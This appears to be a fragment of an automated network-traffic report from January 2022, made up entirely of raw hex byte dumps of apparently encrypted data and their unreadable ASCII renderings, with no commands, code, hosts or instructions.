                          Data Ascii: 3bd|_(;EUe^L1T'V&>+C!Li%M8J]Ae<OAG"/$%4`?'Y86{NhD)Thc=+LB$=h$Z=6bj?w}:G}8SNxYs4w9aQ}Z2m@KY3zW89u1}QQ)8mHVa|SH
                          2022-01-13 19:22:46 UTC573INData Raw: 8d 8c f7 a3 90 18 56 cf 7a a8 0a 2a 80 20 dc 4f 23 15 9a 8c 56 70 10 89 c5 48 d1 30 1f e8 b1 b5 d0 ef 2c 84 56 eb 9a d7 d6 85 cb 63 73 b2 9b 20 67 03 22 15 d6 d2 4c cc e9 87 60 2e 1e 7e aa 5d 2c 88 0c d6 e7 24 59 ad b8 33 23 23 9b 4a 17 b6 d3 69 0c 46 da 1a 8a 3f 5c fa 2e 78 5a de 9a 7d 34 e4 87 94 ec bb 5a e1 b7 2f 5c ff cb 6f 68 ee 28 96 bb 51 4c ce e2 8d 68 83 d4 6c 35 35 96 61 7f 5c 4b 9e 69 82 a0 30 74 02 c2 03 67 89 cb 6f 1a f7 bf 8a 30 6d dc 7f 08 b4 24 7c be cc f6 56 28 e3 2f e7 23 ff d9 92 24 5d e4 e3 37 08 ff ff 3c 74 82 d4 be ca 32 a1 12 b4 33 9d 83 c9 02 c9 75 25 46 1d 94 f8 a5 37 4b 8a 27 55 f7 d2 e5 2c e1 5c 90 2d cb c3 a7 52 ab fa 5a 7f 2a c6 c9 77 20 0c 0e 22 17 bc df 78 cd 74 b1 00 76 d9 ea 33 5d 7d 22 7e e3 63 a1 cb 06 fb d7 65 43 2c b2
                          Data Ascii: Vz* O#VpH0,Vcs g"L`.~],$Y3##JiF?\.xZ}4Z/\oh(QLhl55a\Ki0tgo0m$|V(/#$]7<t23u%F7K'U,\-RZ*w "xtv3]}"~ceC,
                          2022-01-13 19:22:46 UTC574INData Raw: 1e 12 58 fb d0 f6 2b 78 b7 b3 54 02 c3 58 e5 3d 3e 1e 03 56 4e 7d ba a2 17 c9 75 ac f7 c5 45 a9 43 db b6 fe 3d 1f cd 6c 8d f8 4e 4b b1 b7 bb 81 cd 6b 07 2f 66 66 8f 48 62 f8 59 6f 0f b7 bc 08 df 83 24 10 5d 65 1b fb 5e 22 7f da 3f 72 c3 ef f1 50 68 56 fb c0 c2 a3 c4 22 e0 25 38 6e e7 80 be 0e 40 fe a2 0f c1 f3 72 62 2c 32 69 b2 87 b1 b4 39 b1 d8 f0 11 6b 9d f7 d0 ec bb 30 04 ac 26 29 9f e9 b7 71 54 96 67 11 dd 43 01 31 9a d1 73 36 87 56 f4 5c 59 d7 66 f9 86 3d 3f 54 80 56 6a 29 87 d0 46 1b 65 16 1c e4 bf 4b ee 9a e3 69 02 d5 04 a1 4a c3 57 7e 0b 0a db e4 7f ac cc 8d ec b3 b0 81 2a 26 64 9b fe 35 0b 21 f0 da 8d 29 97 f8 42 d5 a3 f5 67 96 8f eb 3e 37 a1 11 54 24 6a 92 78 e7 20 74 b5 b8 5f 65 27 07 37 ae 80 fd c7 73 2b 92 16 fb 7e 6f 14 4a c6 a6 17 3e ba da
                          Data Ascii: X+xTX=>VN}uEC=lNKk/ffHbYo$]e^"?rPhV"%8n@rb,2i9k0&)qTgC1s6V\Yf=?TVj)FeKiJW~*&d5!)Bg>7T$jx t_e'7s+~oJ>
                          2022-01-13 19:22:46 UTC576INData Raw: 2a 1e 91 1c 6d 10 e5 bc 76 55 65 12 51 e7 e4 ab dc 8a 27 0d c5 4d c3 b7 c7 00 a8 18 fd 60 2d f9 8c 24 38 2a 7e fc 57 81 33 9d 9b 4a 06 da 1c 18 8e 0c e8 1b 5c f0 be c6 ad a7 83 75 28 00 05 9b 44 bb 56 f4 49 f8 88 4f 2d 88 6a 1f fe 5a 72 ce f4 3c 8b 74 5f 7b 3f ae 4e b0 29 45 03 3c 32 a0 d7 6a 28 d2 9b 4b 12 4a db 1c c4 3f b3 0c 8f af d4 96 0f df 5a 80 4a cb 85 03 47 17 1b e8 a6 0c 5a a1 2c 37 ec 7d 2b bd 21 e9 a5 52 57 54 ea b7 f4 56 d3 13 7c a4 ab b0 c9 74 b0 2b e7 ae fb 8b df 0c 40 2f fc fd 38 ee b9 4e c7 1c 38 8a f6 9b f6 4d 58 e0 f2 b9 5a f3 80 ad 33 2b 53 12 41 c7 ba 7d 22 f2 5f 77 2e cf 97 21 f2 49 4b b6 34 01 ba b3 7b 6c ed 50 c0 76 24 6e 87 70 e9 4d f3 29 48 a6 8a ba ba b5 af 38 52 de 88 ba 00 2d 26 c4 b4 4d 5d 71 9c da d6 eb a0 71 2f 62 b5 11 28
                          Data Ascii: *mvUeQ'M`-$8*~W3J\u(DVIO-jZr<t_{?N)E<2j(KJ?ZJGZ,7}+!RWTV|t+@/8N8MXZ3+SA}"_w.!IK4{lPv$npM)H8R-&M]qq/b(
                          2022-01-13 19:22:46 UTC577INData Raw: e6 f5 8a 0e 13 bc d5 a3 42 33 93 54 24 0b ba c2 6c 11 dd 1f 5f b0 40 dc 5c 8f 50 db 14 4a c1 c0 6c 13 bc 9e 60 a4 46 92 3a 41 b9 a1 40 3a 21 44 e2 e1 72 bf 06 3d b5 b5 0c 80 35 27 34 61 96 53 50 ca e5 89 8c dd 6a d4 98 2e 52 97 a1 f5 c6 8d 2f 8c 4d e0 4f 23 98 7b d1 8d fe 56 5c 25 8c eb ec de 74 61 60 f8 54 72 4d a4 6f 57 03 6f 5f 2f cf 15 c6 31 4c de 96 cc 33 ef 5b 77 4d d2 e0 91 0a 78 c8 5d b9 25 14 b3 be d7 17 7c 5b 8e 06 ef 43 ed 67 54 b7 d2 ec c3 98 76 a9 2e c1 25 9b f4 4a 32 10 51 b9 94 15 38 e6 f9 8a f0 fe de f3 89 b2 67 58 a7 d5 07 2b 82 96 66 98 c8 3d cb 01 31 ba 36 07 31 28 d9 65 eb e2 c6 66 2c e1 9e 64 d5 02 f6 04 f5 82 3a 2c 37 76 b2 31 27 3b d2 85 ce 3a da 84 55 df df 63 b7 6e c2 20 f9 2d 38 9c 6a f6 a1 89 db 05 33 2d 3d f5 c5 56 fd c9 67 49
                          Data Ascii: B3T$l_@\PJl`F:A@:!Dr=5'4aSPj.R/MO#{V\%ta`TrMoWo_/1L3[wMx]%|[CgTv.%J2Q8gX+f=161(ef,d:,7v1';:Ucn -8j3-=VgI
                          2022-01-13 19:22:46 UTC578INData Raw: fa 8e 1d 0e a4 16 3a 4d d1 f2 dc 30 ae 57 7b 94 46 ac 8d f8 31 00 e2 fe 2c 1f 0a bf 5d 64 64 42 3e d7 dd 49 40 75 75 ec d9 0d ee aa 27 eb 7f 27 80 40 47 2f 99 ff 30 d3 0e 94 74 ef 7c 74 8a 9c 45 28 a0 13 4a b5 cf 06 ef ca dd db 15 da 97 eb 91 40 f5 19 e7 54 36 7b 2b 87 c0 71 b4 2d 8e 67 13 6a 5a 16 27 fe 86 d8 42 45 9f 88 57 70 ad 75 ca a0 06 17 c7 dd ab 60 f0 0a f5 fd 8d b5 fa 9c 3e 49 eb 2c e3 0b d1 70 a9 94 07 65 13 c0 db 16 c5 e4 bb 53 56 f8 04 aa 4f 83 23 fd d9 19 ca e9 28 02 a4 05 79 47 5c f5 6f 8b c9 78 b4 21 91 eb af a5 87 d8 21 b7 dd ff 11 bb f3 e5 28 be df 42 ce 58 96 10 1a 1d 26 9b 6e a5 5a eb 45 cd 43 52 e3 1c 67 08 b9 9b dc e6 21 48 65 1d f8 53 53 e2 21 b0 0e 17 d0 dc cc 48 ed 73 ea 76 e2 23 3e 45 03 5b d2 f9 5c 1b 80 fc 6f b4 d7 7f 6f fa 36
                          Data Ascii: :M0W{F1,]ddB>I@uu''@G/0t|tE(J@T6{+q-gjZ'BEWpu`>I,peSVO#(yG\ox!!(BX&nZECRg!HeSS!Hsv#>E[\oo6
                          2022-01-13 19:22:46 UTC580INData Raw: b0 2a d5 cc ee b5 ba 50 2a 11 1e b2 30 0a e9 24 dd 32 ee 9d 76 8c 57 fc 99 2a 10 5a ec 22 f3 c0 17 ec ad 47 82 b5 8e b2 78 95 52 9c 09 97 9c 08 59 38 24 ac e7 2c 13 8f e9 8f dc 77 07 cf 48 c7 fd 0d 17 d9 01 23 32 23 fd 7f 54 68 b7 6f 4c ea 09 2e 86 9e 96 96 62 28 bc de 18 87 ca 0e 99 36 02 af a8 8d 83 c7 be 02 a1 9d e3 09 af fe 5d a5 b2 34 88 ba ba e0 44 6c bf ef 40 23 57 7b c3 4a 4b 52 db d3 aa ee ba d5 78 19 64 84 9c c3 5b 78 5d 79 a4 5c ed a1 4b 44 16 80 16 73 8e b9 e7 6a 83 03 19 c3 c5 ed 3c 84 ff da 22 26 6c 3b 85 47 7d ec 7e a2 0f 95 eb c4 ee b0 b3 79 ec a2 08 b0 98 a0 0b 66 58 6b 32 d5 36 39 39 4e d8 25 46 cd a1 a8 03 b8 4b 5e 6d 52 d4 51 d4 ea 01 34 6b 64 24 88 46 dd 1d 7b b6 44 97 99 e4 97 60 74 a3 8b c4 7e 5e 80 53 81 5f ce 87 45 f8 32 0e 98 d0
                          Data Ascii: *P*0$2vW*Z"GxRY8$,wH#2#ThoL.b(6]4Dl@#W{JKRxd[x]y\KDsj<"&l;G}~yfXk2699N%FK^mRQ4kd$F{D`t~^S_E2
                          2022-01-13 19:22:46 UTC581INData Raw: 43 50 30 af 6e 26 bc 20 c1 fc bd 8f 03 ee 05 85 72 14 94 d1 b7 0f 39 41 53 9b 1c bb a0 ed da 66 55 dd d5 cb d4 1f 05 fa e9 fd 63 ee 47 f8 93 54 28 af 5b 9d 67 d6 3e e6 4d e6 49 ab 7c 04 91 08 5e 13 64 47 ab 9d 37 17 69 f3 03 cd 58 08 5f 91 55 bb aa 07 d9 f8 a0 e1 c5 b6 0e f6 a6 f8 a2 d7 bf 78 05 81 7e 4f 83 23 d9 bb ad 4c 7f 0a 53 69 fa bc 7a 0d 10 fe 5c 1f 59 d9 ea 7b 80 5e 44 d8 29 32 d9 ed 2c ed d7 e6 4e 19 68 94 82 f7 23 05 ec 5c ea 40 d2 1f 0d 18 e6 b8 d9 bb fd 3c b8 e7 79 5a 3b 2c eb b5 20 93 e0 89 c2 d4 be dd b3 fc 2e 87 0a 14 db 18 c3 e1 13 72 14 6c 99 f8 92 ae 22 71 b2 28 e7 89 35 fe ec b7 bc 36 e0 36 5d 61 b6 22 69 ff 4d 96 6d 2c e9 98 9e 7d ad 13 d3 00 7e cd 12 88 f9 ac 2b 92 78 af d7 cd 8a 5f 04 66 63 1e 76 ad a7 8f e9 09 3f 98 ab a5 83 a3 5d
                          Data Ascii: CP0n& r9ASfUcGT([g>MI|^dG7iX_Ux~O#LSiz\Y{^D)2,Nh#\@<yZ;, .rl"q(566]a"iMm,}~+x_fcv?]
                          2022-01-13 19:22:46 UTC582INData Raw: d2 24 0d 54 98 7d 5c ef c6 c8 e0 82 ab 6e 80 d6 60 ea 18 81 9f e7 bf 37 de 06 01 22 12 ee 52 a6 bd fe 58 81 8c 5a bf 51 58 c0 48 2c 1a c5 64 c6 0e 92 59 0b 48 3a 44 ad bb f0 ab c3 2a 71 80 1f 90 c2 6e 84 0d aa 31 14 3f b7 b4 91 1f f0 31 a0 5b df ac 27 58 93 ff 48 ad 1d e4 13 15 d7 db e7 2e 8c 5c a7 98 a1 37 b2 65 1b bd 4a 8f 5a 09 40 76 c1 b8 f3 8f 8a 08 16 ec c1 06 a1 62 9f 93 51 13 d4 1d 95 e0 61 53 16 f8 39 47 e3 f7 c1 f4 ae 34 1b 10 7e 5c 15 ca ad 23 88 8b a9 25 f9 d5 9c 02 2b d2 f1 f0 a3 8c 4a 7b 2b d4 ab b8 dc 66 93 b3 9d 9c 77 95 3c 28 72 34 ff df 17 1e 09 30 0a 0e 99 f3 c0 0c 11 64 83 23 c0 9e fc fb ab a2 4f 28 9e eb 26 04 cf 63 94 05 3d b6 97 44 27 1e 00 19 2f 4b 47 27 e2 07 53 5d 67 95 1e 60 87 d7 e7 56 f8 4e 67 c9 15 c8 3b e1 bf 46 8a 09 69 bc
                          Data Ascii: $T}\n`7"RXZQXH,dYH:D*qn1?1['XH.\7eJZ@vbQaS9G4~\#%+J{+fw<(r40d#O(&c=D'/KG'S]g`VNg;Fi
                          2022-01-13 19:22:46 UTC584INData Raw: 5d d8 fb de c8 43 82 00 69 80 39 d3 89 ea f9 89 7d 5a 81 92 28 93 cd 32 d7 ad 99 86 45 38 8f e3 ff dc ca ed 31 97 94 01 78 f1 3c 29 99 e4 5e f4 df af 0a be de 81 b1 d2 3f 56 7a a6 12 5f 7a aa 66 ef 21 e2 67 2f dd 19 c4 c1 4a a6 b4 a9 0b c9 63 0f b0 62 10 d4 54 e8 a0 0b d2 4e bd 53 50 4e 59 15 9e 01 be 7b a0 19 d2 f7 ab e4 a1 ca db 1e 76 ca 93 4d f2 d6 8b d1 66 e7 77 25 01 24 64 99 62 69 89 dd 07 22 cf a4 9c b5 6a dd 7e 0b 37 e4 d5 da 32 ed ab a6 04 b1 57 83 02 ea a6 b4 f3 35 31 90 66 9d fc 5f 14 32 04 bc 26 a1 8e 12 e1 84 ed 2b 95 f5 ac 58 e8 f4 3d ac 2d 29 31 22 e0 92 63 16 ba 11 c3 2e 17 93 9a 7d 21 59 c0 7a a6 06 b3 d0 e9 95 8b d0 f1 a3 e6 3c bc c4 b0 2d 85 d9 c8 ff dd 03 54 70 48 27 ed 36 11 a8 b0 c5 c6 ad ae 3f aa 35 8e f9 aa 86 30 0d 1a 76 bf 58 7a
                          Data Ascii: ]Ci9}Z(2E81x<)^?Vz_zf!g/JcbTNSPNY{vMfw%$dbi"j~72W51f_2&+X=-)1"c.}!Yz<-TpH'6?50vXz
                          2022-01-13 19:22:46 UTC585INData Raw: 48 c4 8c b7 bf 48 af 05 73 2a 1a be 1a 78 b3 5e 20 0f 9a 26 27 b1 71 d9 0d 63 dc f5 ee e2 30 9d 23 17 1a fe 3b 4a c6 2e 11 a5 f4 20 30 50 3c 8f 80 96 24 69 7f 1c d2 e7 73 28 5e e5 f7 23 e1 4b 57 9f 82 9f 6d 15 9e 18 12 5c 3c 91 e1 57 71 39 bf 86 be 19 c7 7d 3f b5 a3 89 42 d0 22 3e 36 70 b2 9b 9c 18 52 4a 8f 9c 49 0b bf 5a 26 42 37 af 02 4c 77 48 dd 0d 9e 29 fc 71 5b 21 f4 0a a1 e2 3e 0b 6a 5f ed 5b 62 93 ab 0e 00 ca f1 1c f1 3c 3e 70 45 39 b6 40 99 f6 45 2f de 99 ad a9 f9 89 c7 af 37 a8 0d 6c b6 83 01 cb 87 e9 60 7d a1 e6 6b 6f 43 b5 00 a6 16 44 ab 82 01 cc 96 d2 a3 eb 20 4f f4 57 70 c7 2c 13 8b ca 89 97 ec 2a a2 0f d4 53 74 1a b9 bf f4 69 50 88 fb 3c 51 28 5a ed 36 7c b8 3c 34 a0 d7 7a 0c 9f d0 8a c1 2e f4 02 ad 0f 72 af ca 95 fb 04 c2 ce ec 51 9c 62 34
                          Data Ascii: HHs*x^ &'qc0#;J. 0P<$is(^#KWm\<Wq9}?B">6pRJIZ&B7LwH)q[!>j_[b<>pE9@E/7l`}koCD OWp,*StiP<Q(Z6|<4z.rQb4
                          2022-01-13 19:22:46 UTC586INData Raw: f9 dd 1a b8 b0 33 9a 94 b2 30 70 09 9b 11 bb 49 4e bc 8b a5 8f 5e 5b 77 23 43 7f b8 ce 2a 56 01 54 73 b9 b6 36 0c 51 20 f4 fd d7 95 46 d3 dc 34 ec be c5 5a fd 13 d0 f1 26 ee 0f 43 a2 0f c1 16 44 42 31 f2 3c 3c 35 0f 6f 90 69 1b e0 e7 b4 eb 9b 99 fe 54 a3 92 10 5b 77 25 a9 dc e1 b3 09 5b 72 fe 72 ad ae 8d c2 60 2a f9 76 95 b5 d3 33 24 08 ac 0d 55 66 88 35 c8 fb 83 d0 8c 15 ce 69 bb 4a d0 41 79 47 e3 3e 38 21 56 a4 08 58 17 bc cc b7 ca a2 e4 db 14 97 52 c2 cb cb 0f b9 2c 4f 59 23 ff a3 c7 7b 75 8c 5e e0 21 24 19 40 da 89 d4 48 43 b7 a6 8e 2f 8d 0d e9 78 dd 40 3b f2 5c e3 ea 23 ee b9 f7 09 31 fb 7f 27 4c be cb 73 55 11 a0 0a 08 25 f8 43 53 9f e3 b4 74 ba 7f ec f2 31 db 07 79 27 f7 b3 3d b2 3b 05 eb 3d d7 ae b6 ea db 13 c0 af d0 9e 1c 33 3f a7 95 11 18 3b 57
                          Data Ascii: 30pIN^[w#C*VTs6Q F4Z&CDB1<<5oiT[w%[rr`*v3$Uf5iJAyG>8!VXR,OY#{u^!$@HC/x@;\#1'LsU%CSt1y'=;=3?;W
                          2022-01-13 19:22:46 UTC588INData Raw: f4 41 b9 48 df 0f 39 b4 25 41 60 9b 4a 10 29 31 93 e8 a6 11 64 3c 03 28 14 42 92 fd 1c 65 0b cb 0f ba de a2 02 a4 0c af 6a e8 1f 30 71 cf 46 dc 88 4e 4f cf 82 43 b6 37 c4 79 8a c9 6d 12 5b 0e e7 b1 f0 b8 37 a0 75 51 50 9c c6 c0 c7 8e ac 4a 63 b3 e1 0a a8 00 4b 97 8d 59 be d6 9b f0 d3 66 de 9f 81 c6 4e 48 85 ce f9 c6 72 06 ee bd 57 7f aa 52 bc 60 14 e0 0a 09 43 ac 28 0e 27 82 38 27 3a 15 c5 5c 84 ec d8 81 a3 3c 45 e0 24 4d 58 e6 b6 49 d4 12 41 de e9 51 fd 94 6e 3c 60 e6 a2 40 cc eb 38 9a b4 c8 4c 1a 3b d2 5e 14 05 3e 26 7a c6 bb 57 c7 65 1c 7e 5c 3d cc a7 c9 f1 01 72 76 05 c3 08 a5 87 d4 bb f6 36 5a ea 00 0c 64 89 cb 7e db a6 f0 b9 34 75 57 c6 40 e4 aa 32 1d 88 34 65 7e ae 73 0f d6 86 f0 24 3c 30 1f f9 3f 7e 46 2d 44 ca 91 84 36 1a 78 a9 82 58 57 ad db 52
                          Data Ascii: AH9%A`J)1d<(Bej0qFNOC7ym[7uQPJcKYfNHrWR`C('8':\<E$MXIAQn<`@8L;^>&zWe~\=rv6Zd~4uW@24e~s$<0?~F-D6xXWR
                          2022-01-13 19:22:46 UTC589INData Raw: 4a ae 30 0e fc 9d e6 4d b2 75 50 ca f8 1a 08 02 5f 09 3c 48 37 e0 99 fd d7 b0 92 08 bf 03 4b 1e db 68 97 f2 24 6b ad 2a 07 2d 67 c0 b6 6d 24 77 2d 97 66 15 fc 44 36 0b b5 c7 78 c2 c6 dd 17 7b 35 3e 8c 42 43 2e 67 26 0e e1 fe 4c 84 c7 77 2c 09 a0 b6 5d 1d 90 ce aa 30 c8 0e 90 62 94 64 8c 47 5f 63 cb 87 e6 d5 7a bf 4c 42 7c 95 51 03 04 1e 3a 0a 15 9a 45 e5 6e bd 52 92 5a f7 c6 31 4d 30 a1 4d 33 79 2f 88 49 5a 47 08 bd af ef 50 a3 7d ff d4 ef 3f 14 2e 66 fe 03 34 b3 52 cf 1e 33 ee d5 0a ac 9a 55 6c 97 4c 18 38 c3 0c 40 56 5c 61 60 f4 44 ac ad de 78 e8 d3 0b 30 33 89 dd 0a 5f f9 bd c9 1c 85 03 35 93 fe ee 22 4a d2 e3 10 0a 4e 76 c5 24 2f 8c 3c 60 e7 b9 f5 dc f6 e0 75 0a b8 22 77 48 a3 e9 be 78 a3 f6 34 7e d2 52 91 ec 77 92 67 05 de 30 1d e9 36 27 e3 03 c0 07
                          Data Ascii: J0MuP_<H7Kh$k*-gm$w-fD6x{5>BC.g&Lw,]0bdG_czLB|Q:EnRZ1M0M3y/IZGP}?.f4R3UlL8@V\a`Dx03_5"JNv$/<`u"wHx4~Rwg06'
                          2022-01-13 19:22:46 UTC590INData Raw: 36 db e6 2a 0d ca e8 fe 42 6b 1a a9 22 cd 36 19 9b ec fa cb 99 40 31 be df 0e 5a 43 09 18 5e f1 33 f7 62 27 a8 0a b3 a1 f2 2e 16 fc 70 be c1 c5 c0 fd cb 79 3e 50 c3 ae 26 64 97 21 ab b9 50 c5 17 88 1b 07 66 16 fd 36 39 ae 3d be d8 b3 93 ec ba 66 1e 53 40 39 a9 7d e1 aa 49 29 54 ee a3 81 ce e3 16 09 47 00 b2 7e 5f b9 af 8a 4d 58 ec a9 48 e9 38 26 05 e3 d8 3a e6 dc fc c2 74 9f 86 5f 76 ca e7 03 21 ec b0 86 f4 fd e4 b6 2e 1e 8b 1f fb bc dc 6b 1f e9 33 39 1a 6f 15 da 99 88 5e 27 f2 44 27 14 9e 6b f5 7f d3 73 5b e3 b2 2e 0b c3 55 09 9c bf 77 2d 87 c2 bc d0 5d 6d 08 bb e5 86 bc f7 df 0b c5 b5 6f 15 aa 21 62 8f e6 bf 0a ac 73 56 79 ae 17 dc 84 41 d3 12 57 0a 84 45 48 57 95 9f da 8a d5 77 22 72 4b 8e 01 29 5e 87 70 12 6e 8c 55 61 23 86 59 39 ae 35 94 c2 46 2f ad
                          Data Ascii: 6*Bk"6@1ZC^3b'.py>P&d!Pf69=fS@9}I)TG~_MXH8&:t_v!.k39o^'D'ks[.Uw-]mo!bsVyAWEHWw"rK)^pnUa#Y95F/
                          2022-01-13 19:22:46 UTC592INData Raw: 47 50 db 0c 57 c7 71 20 71 21 b2 44 5f 9a e9 48 c4 da 9c 6c 35 3f a7 83 da 97 86 47 4e d1 75 30 fd 1c 19 91 bc 9b 08 14 18 57 38 3d e4 99 8c ed 4c cc be fe 58 f0 57 a4 08 c7 d5 bb 28 7b 3c 61 81 db 0a 57 bd 22 c7 a9 de e9 80 3d 09 8f ee d1 0e 56 da c0 9f 4e d2 f7 d6 9f c7 c7 45 0f 13 70 d1 b8 61 86 25 3d 9a 08 1b e5 97 e4 e5 3a 31 9b 91 a7 2f 37 4f 84 1d f0 c1 46 ac 38 22 7d c5 60 a7 87 de 80 41 4b 8d 87 47 e2 36 0f c4 d4 9f 51 e0 93 f7 d7 17 da 13 3b b2 a3 73 2b 12 a6 13 07 d4 22 cd 7d 2f 82 0e eb a3 3c 2f 8d f2 59 5a ff c3 49 eb 76 dd 56 eb 75 d5 d9 e2 05 3d be cb 08 c6 cf ed b5 b1 ba 67 b2 56 bc c2 40 c5 40 49 da ea 63 62 d0 fa 09 26 3d a2 10 51 2d c4 d9 4b 40 7e ac 5c 59 c4 77 30 0c 47 3f fa 4b 24 6e f3 f5 c5 5c 03 f4 10 f9 0a e7 26 29 2f a7 d6 43 2c
                          Data Ascii: GPWq q!D_Hl5?GNu0W8=LXW({<aW"=VNEpa%=:1/7OF8"}`AKG6Q;s+"}/</YZIvVu=gV@@Icb&=Q-K@~\Yw0G?K$n\&)/C,
                          2022-01-13 19:22:46 UTC596INData Raw: 00 4e b9 d9 99 ef d9 f9 d2 30 10 52 bb 64 85 d2 54 6a d0 91 20 89 c6 0e 22 ff 0d ae 88 01 50 a5 56 3e 59 58 f5 95 3a ae 4c 42 dc d8 44 dd f8 17 2f 79 42 d6 4d 5c 6e 5b 65 24 c3 79 d2 39 3d 76 b6 30 d6 33 7e 3b 52 2e 12 0a f6 65 a3 53 ce 2c 0a e2 cc 49 33 75 88 1f a5 19 74 6e d0 73 75 0a fa 0a da 95 5c b2 ea 30 2c fe 8c 89 b5 d5 c6 bc 76 6c 6e d8 b5 c2 7e 5c ba fc ca 23 21 12 b2 f4 75 8f f6 fc 6c 3c 89 37 04 17 98 aa 27 b2 24 b6 6a de b7 8d e2 79 5b a2 aa ed 88 84 a3 a5 58 f7 65 13 b3 a7 95 6e 76 19 95 ff 0f f1 79 3a e8 d8 c0 70 47 2e 85 b2 6a 77 37 18 48 59 09 ea 07 30 6f 3f 96 4a 8f e9 0d 8f f5 3d 32 a1 5b 83 91 9e 6a aa 6e 88 52 33 79 aa 35 32 85 06 ee c7 d3 31 f5 05 8d f9 ff 35 59 b9 22 73 4b 09 47 33 ec 53 31 fd 5a 8e a5 02 48 d8 1b eb a2 c6 1d d3 9f
                          Data Ascii: N0RdTj "PV>YX:LBD/yBM\n[e$y9=v03~;R.eS,I3utnsu\0,vln~\#!ul<7'$jy[Xenvy:pG.jw7HY0o?J=2[jnR3y5215Y"sKG3S1ZH
                          2022-01-13 19:22:46 UTC600INData Raw: ce ec bf 5a 82 33 9c 0b 03 3f a6 b5 59 63 6a 30 be cb 7c b3 bc b0 58 e3 d5 69 1d fd 65 c2 2a b5 7b 92 dc 9d cf 1c c9 ba 85 be a8 69 19 60 36 03 27 51 87 a4 c2 d2 f7 d6 9f c9 fd e1 5b bf fc 92 2e 66 26 fc 3b a4 5b 11 b0 5b 6a d2 2a 02 ad 15 0f a9 11 02 fc c7 4a 9b 3a 72 39 54 27 8b 78 b1 5f 65 60 e3 1e 69 70 5e 3e 79 3d aa 2a 1e 12 e1 8c 54 e6 a9 95 97 20 89 c1 4b 46 dc 90 34 b1 06 bd 5b 66 94 69 13 f3 d3 67 a6 58 97 be ba 67 a2 13 dd 1a 75 56 8d e2 de 53 57 69 f0 03 31 f6 e4 3a 25 e9 29 92 09 58 fe d4 ea b2 35 77 ef b7 50 02 3d 43 b9 01 5a 40 fc 10 2b fe 26 69 0a 67 0a b0 95 33 f3 12 41 ab a0 0a e2 31 a9 cd b0 c4 18 19 ae c7 97 91 f3 98 11 ac 51 4f 65 c3 52 d8 6b dd 61 ff 1a 3d 39 90 2b 56 cd d3 7c 17 b2 aa 21 40 3b d8 15 6f 79 50 b6 6f d7 ef 30 18 41 b6
                          Data Ascii: Z3?Ycj0|Xie*{i`6'Q[.f&;[[j*J:r9T'x_e`ip^>y=*T KF4[figXguVSWi1:%)X5wP=CZ@+&ig3A1QOeRka=9+V|!@;oyPo0A
                          2022-01-13 19:22:46 UTC601INData Raw: 6d e9 26 2a 84 d1 ce ec a4 19 d5 01 3e 16 72 a2 0d 54 0b d3 6b 69 b8 a4 19 dc 92 79 56 93 ff ee 6c 9f 88 ef f1 40 8f ca ab f0 5c ae 43 f1 78 cd 2c 1a cf c9 7f c3 43 ab d2 ab a1 fd b7 a3 88 f9 ce 40 eb 4e 33 92 26 9a e9 91 93 45 a6 6b 79 98 ea 3d ab a5 8f 95 69 b1 c8 e3 04 bd 29 62 22 96 76 b1 ae 43 08 7c c5 39 f4 59 99 e6 a8 09 cb a4 78 5f b5 e7 48 ae 6c 92 20 b9 5d 69 ad 62 fd 2b 8a e8 29 9f 86 5a f5 da e4 11 76 a1 84 42 90 bd 0d 84 13 71 1e 3b 67 55 38 ff c2 c7 73 29 ce 63 25 bf 91 b6 64 73 e9 7a 1f c6 87 1a 25 db a5 cf 08 18 42 8e 79 11 cf 68 96 1b a4 45 3d 76 b2 f3 c6 0d 1b fd df f5 46 a7 6a a2 40 c2 b1 13 be 13 7a a2 76 3b 71 4c bb 48 c0 18 e5 e2 ee b4 d7 15 08 00 72 de 93 09 37 eb d0 04 6c 95 51 90 7f da 06 88 ec 73 4e 16 b6 24 c9 7d 6d 14 95 11 db
                          Data Ascii: m&*>rTkiyVl@\Cx,C@N3&Eky=i)b"vC|9Yx_Hl ]ib+)ZvBq;gU8s)c%dsz%ByhE=vFj@zv;qLHr7lQsN$}m
                          2022-01-13 19:22:46 UTC605INData Raw: 44 6c 8f fa 5c 19 07 d8 2b 62 ba bf fb 1e 79 4d 54 d6 56 f9 c2 7c 96 c6 01 51 be f6 39 1c a7 8b c5 50 4a ae fe f3 27 9b 84 31 83 3f 7f ce fe ee 73 4d 1d a5 4e da 96 6b 16 1f 79 11 90 a2 1e db fd a8 a2 91 6a 0b 33 4b c8 16 9c 63 a8 11 7d 3a 71 4e 47 04 cd 0b 31 48 83 99 ec e7 55 f1 d3 b7 df 78 73 ce ea da fa 3e 50 1a df 1b 55 d6 f3 cc 2b 6c ba 98 6b 55 64 53 e3 34 51 44 69 14 9f 30 23 ac 2d dc 8b 12 f3 f5 89 d8 cb 6c 48 25 d3 84 56 b4 2d 41 5b 53 16 56 a6 12 0a 2e e1 11 64 60 2f 3b 11 11 5e 40 e2 3b 4c 07 a7 27 29 16 ee 76 34 f2 89 46 21 cd 26 d8 6b 3a 85 26 5f 71 e8 0a af a0 86 8a 1c 70 f6 3d 31 f8 d3 06 d9 ce 1d 43 b1 16 ba 6e 0f 22 d6 14 b9 d9 98 96 df bf a1 16 fd 66 25 6d f6 8a 1d 4c 69 d4 50 6d c4 d8 03 8a 4b 49 ec ea c4 9f 8c 17 d1 d4 42 60 bc aa 3f
                          Data Ascii: Dl\+byMTV|Q9PJ'1?sMNkyj3Kc}:qNG1HUxs>PU+lkUdS4QDi0#-lH%V-A[SV.d`/;^@;L')v4F!&k:&_qp=1Cn"f%mLiPmKIB`?
                          2022-01-13 19:22:46 UTC609INData Raw: a0 01 3e 4e 8f 76 3e 3f a3 90 74 ad e3 8b db 1c 36 02 a7 86 50 71 82 23 e1 06 b2 63 07 5b ae c6 bf 4d 54 e8 b1 ad 16 cd 74 b0 7d d8 2c 69 c7 25 f0 dd c5 e7 f8 5e e2 77 ba c1 4b d1 ce 3d e6 d9 68 88 7d f7 d1 6a ca e7 7f c9 c5 c9 60 ee a7 9a 17 90 78 dd 8b c7 7c 24 ed 30 1c 73 27 8f 04 03 44 39 b6 2a 6c 8f 10 9c 0c 4c 77 89 b3 b7 b1 a1 36 db b7 d6 8b 66 14 5e f7 9b e7 bc a4 d8 53 e8 b2 53 54 fc 5b 36 72 39 4f 27 fe 4b 5b 1e 76 fb 03 20 6e 06 21 8f ee a2 13 a1 2a 45 2e 74 bd fb 4e df 19 6d c1 25 65 02 03 f1 46 7e 59 7d 2d 89 5e 24 37 07 2e 02 b5 df b3 5d 16 48 da 99 6f aa 50 d3 74 bc 61 9b 9b ff dd 04 fb 44 8b ad aa 28 0e e0 71 51 49 49 49 da 33 fb db 02 b0 53 8b 3c 5f 